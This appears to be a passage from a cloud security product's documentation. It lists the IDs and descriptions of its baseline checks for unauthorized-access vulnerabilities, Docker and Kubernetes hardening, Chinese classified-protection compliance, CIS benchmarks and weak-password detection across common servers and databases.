hc_exploit_k8s_api | High risk exploit - Kubernetes Apiserver unauthorized access high exploit vulnerability risk | |
hc_exploit_ldap | High risk exploit - LDAP unauthorized access high exploit vulnerability risk (Windows) | |
hc_exploit_ldap_linux | High risk exploit-OpenLDAP unauthorized access vulnerability baseline (Linux) | |
hc_exploit_memcache | High risk exploit - Memcached unauthorized access high exploit vulnerability risk | |
hc_exploit_mongo | High risk exploit - Mongodb unauthorized access high exploit vulnerability risk | |
hc_exploit_pgsql | High risk exploit-Postgresql unauthorized access to high-risk risk baseline | |
hc_exploit_rabbitmq | High risk exploit-RabbitMQ unauthorized access high exploit vulnerability risk | |
hc_exploit_rsync | High risk exploit - rsync unauthorized access high exploit vulnerability risk | |
hc_exploit_tomcat | High risk exploit - Apache Tomcat AJP File Read/Inclusion Vulnerability | |
hc_exploit_zookeeper | High risk exploit - ZooKeeper unauthorized access high exploit vulnerability risk | |
hc_container | hc_docker | Alibaba Cloud Standard - Docker Security Baseline Check |
hc_middleware_ack_master | Kubernetes(ACK) Master Internationally Agreed Best Practices for Security | |
hc_middleware_ack_node | Kubernetes(ACK) Node Internationally Agreed Best Practices for Security | |
hc_middleware_k8s | Alibaba Cloud Standard-Kubernetes-Master security baseline check | |
hc_middleware_k8s_node | Alibaba Cloud Standard-Kubernetes-Node security baseline check | |
cis | hc_suse 15_djbh | SUSE Linux 15 Baseline for China classified protection of cybersecurity-Level III |
hc_aliyun_linux3_djbh_l3 | Alibaba Cloud Linux 3 Baseline for China classified protection of cybersecurity-Level III | |
hc_aliyun_linux_djbh_l3 | Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level III | |
hc_bind_djbh | China's Level 3 Protection of Cybersecurity - Bind Compliance Baseline Check | |
hc_centos 6_djbh_l3 | CentOS Linux 6 Baseline for China classified protection of cybersecurity-Level III | |
hc_centos 7_djbh_l3 | CentOS Linux 7 Baseline for China classified protection of cybersecurity-Level III | |
hc_centos 8_djbh_l3 | CentOS Linux 8 Baseline for China classified protection of cybersecurity - Level III | |
hc_debian_djbh_l3 | Debian Linux 8/9/10 Baseline for China classified protection of cybersecurity-Level III | |
hc_iis_djbh | IIS Baseline for China classified protection of cybersecurity-Level III | |
hc_informix_djbh | China's Level 3 Protection of Cybersecurity - Informix Compliance Baseline Check | |
hc_jboss_djbh | China's Level 3 Protection of Cybersecurity - Jboss6/7 Compliance Baseline Check | |
hc_mongo_djbh | MongoDB Baseline for China classified protection of cybersecurity-Level III | |
hc_mssql_djbh | China's Level 3 Protection of Cybersecurity -SQL Server Compliance Baseline Check | |
hc_mysql_djbh | Equal Guarantee Level 3-MySql Compliance Baseline Check | |
hc_nginx_djbh | Equal Guarantee Level 3-Nginx Compliance Baseline Check | |
hc_oracle_djbh | China's Level 3 Protection of Cybersecurity - Oracle Compliance Baseline Check | |
hc_pgsql_djbh | Level 3-PostgreSql compliance baseline check | |
hc_redhat 6_djbh_l3 | China's Level 3 Protection of Cybersecurity - Red Hat Enterprise Linux 6 Compliance Baseline Check | |
hc_redhat_djbh_l3 | China's Level 3 Protection of Cybersecurity - Red Hat Enterprise Linux 7 Compliance Baseline Check | |
hc_redis_djbh | Redis Baseline for China classified protection of cybersecurity-Level III | |
hc_suse 10_djbh_l3 | SUSE Linux 10 Baseline for China classified protection of cybersecurity-Level III | |
hc_suse 12_djbh_l3 | SUSE Linux 12 Baseline for China classified protection of cybersecurity-Level III | |
hc_suse_djbh_l3 | SUSE Linux 11 Baseline for China classified protection of cybersecurity-Level III | |
hc_ubuntu 14_djbh_l3 | Ubuntu 14 Baseline for China classified protection of cybersecurity-Level III | |
hc_ubuntu_djbh_l3 | Waiting for Level 3-Ubuntu 16/18/20 compliance regulations inspection | |
hc_was_djbh | China's Level 3 Protection of Cybersecurity - Websphere Application Server Compliance Baseline Check | |
hc_weblogic_djbh | Weblogic Baseline for China classified protection of cybersecurity-Level III | |
hc_win 2008_djbh_l3 | China's Level 3 Protection of Cybersecurity - Windows Server 2008 R2 Compliance Baseline Check | |
hc_win 2012_djbh_l3 | Windows 2012 R2 Baseline for China classified protection of cybersecurity-Level III | |
hc_win 2016_djbh_l3 | Windows 2016/2019 Baseline for China classified protection of cybersecurity-Level III | |
hc_aliyun_linux_djbh_l2 | Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level II | |
hc_centos 6_djbh_l2 | CentOS Linux 6 Baseline for China classified protection of cybersecurity-Level II | |
hc_centos 7_djbh_l2 | CentOS Linux 7 Baseline for China classified protection of cybersecurity-Level II | |
hc_debian_djbh_l2 | Debian Linux 8 Baseline for China classified protection of cybersecurity-Level II | |
hc_redhat 7_djbh_l2 | Redhat Linux 7 Baseline for China classified protection of cybersecurity-Level II | |
hc_ubuntu_djbh_l2 | Linux Ubuntu 16/18 Baseline for China classified protection of cybersecurity-Level II | |
hc_win 2008_djbh_l2 | Windows 2008 R2 Baseline for China classified protection of cybersecurity-Level II | |
hc_win 2012_djbh_l2 | Windows 2012 R2 Baseline for China classified protection of cybersecurity-Level II | |
hc_win 2016_djbh_l2 | Windows 2016/2019 Baseline for China classified protection of cybersecurity-Level II | |
hc_aliyun_linux_cis | Alibaba Cloud Linux 2 Internationally Agreed Best Practices for Security | |
hc_centos 6_cis_rules | CentOS Linux 6 LTS Internationally Agreed Best Practices for Security | |
hc_centos 7_cis_rules | CentOS Linux 7 LTS Internationally Agreed Best Practices for Security | |
hc_centos 8_cis_rules | CentOS Linux 8 LTS Internationally Agreed Best Practices for Security | |
hc_debian 8_cis_rules | Debian Linux 8 Internationally Agreed Best Practices for Security | |
hc_ubuntu 14_cis_rules | Ubuntu 14 LTS Internationally Agreed Best Practices for Security | |
hc_ubuntu 16_cis_rules | Ubuntu 16/18/20 LTS Internationally Agreed Best Practices for Security | |
hc_win 2008_cis_rules | Windows Server 2008 R2 Internationally Agreed Best Practices for Security | |
hc_win 2012_cis_rules | Windows Server 2012 R2 Internationally Agreed Best Practices for Security | |
hc_win 2016_cis_rules | Windows Server 2016/2019 R2 Internationally Agreed Best Practices for Security | |
hc_kylin_djbh_l3 | China's Level 3 Protection of Cybersecurity - Kylin Compliance Baseline Check | |
hc_uos_djbh_l3 | China's Level 3 Protection of Cybersecurity - uos Compliance Baseline Check | |
hc_best_security | hc_aliyun_linux | Alibaba Cloud Linux/Aliyun Linux 2 Benchmark |
hc_centos 6 | Alibaba Cloud Standard - CentOS Linux 6 Security Baseline Check | |
hc_centos 7 | Alibaba Cloud Standard - CentOS Linux 7/8 Security Baseline Check | |
hc_debian | Alibaba Cloud Standard - Debian Linux 8/9/10 Security Baseline | |
hc_redhat 6 | Alibaba Cloud Standard - Red Hat Enterprise Linux 6 Security Baseline Check | |
hc_redhat 7 | Alibaba Cloud Standard - Red Hat Enterprise Linux 7/8 Security Baseline Check | |
hc_ubuntu | Alibaba Cloud Standard - Ubuntu Security Baseline | |
hc_windows_2008 | Alibaba Cloud Standard - Windows Server 2008 R2 Security Baseline Check | |
hc_windows_2012 | Alibaba Cloud Standard - Windows 2012 R2 Security Baseline | |
hc_windows_2016 | Alibaba Cloud Standard - Windows 2016/2019 Security Baseline | |
hc_db_mssql | Alibaba Cloud Standard-SQL Server Security Baseline Check | |
hc_memcached_ali | Alibaba Cloud Standard - Memcached Security Baseline Check | |
hc_mongodb | Alibaba Cloud Standard - MongoDB version 3.x Security Baseline Check | |
hc_mysql_ali | Alibaba Cloud Standard - Mysql Security Baseline Check | |
hc_oracle | Alibaba Cloud Standard - Oracle 11g Security Baseline Check | |
hc_pgsql_ali | Alibaba Cloud Standard-PostgreSql Security Initialization Check | |
hc_redis_ali | Alibaba Cloud Standard - Redis Security Baseline Check | |
hc_apache | Alibaba Cloud Standard - Apache Security Baseline Check | |
hc_iis_8 | Alibaba Cloud Standard - IIS 8 Security Baseline Check | |
hc_nginx_linux | Alibaba Cloud Standard - Nginx Security Baseline Check | |
hc_suse 15 | Alibaba Cloud Standard - SUSE Linux 15 Security Baseline Check | |
tomcat 7 | Alibaba Cloud Standard-Apache Tomcat Security Baseline | |
weak_password | hc_mongodb_pwd | Weak Password-MongoDB Weak Password baseline(support version 2. X) |
hc_weakpwd_ftp_linux | Weak password - Ftp login weak password baseline | |
hc_weakpwd_linux_sys | Weak password - Linux system login weak password baseline | |
hc_weakpwd_mongodb 3 | Weak Password-MongoDB Weak Password baseline | |
hc_weakpwd_mssql | Weak password-SQL Server DB login weak password baseline | |
hc_weakpwd_mysql_linux | Weak password - Mysql DB login weak password baseline | |
hc_weakpwd_mysql_win | Weak password - Mysql DB login weak password baseline(Windows version) | |
hc_weakpwd_openldap | Weak password - Openldap login weak password baseline | |
hc_weakpwd_oracle | Weak Password-Oracle login weak password detection | |
hc_weakpwd_pgsql | Weak password - PostgreSQL DB login weak password baseline | |
hc_weakpwd_pptp | Weak password - pptpd login weak password baseline | |
hc_weakpwd_redis_linux | Weak password - Redis DB login weak password baseline | |
hc_weakpwd_rsync | Weak password - rsync login weak password baseline | |
hc_weakpwd_svn | Weak password - svn login weak password baseline | |
hc_weakpwd_tomcat_linux | Weak password - Apache Tomcat Console weak password baseline | |
hc_weakpwd_vnc | Weak password-VncServer weak password check | |
hc_weakpwd_weblogic | Weak password-Weblogic 12c login weak password detection | |
hc_weakpwd_win_sys | Weak password - Windows system login weak password baseline |
References
[Notice] Log dictionaries are upgraded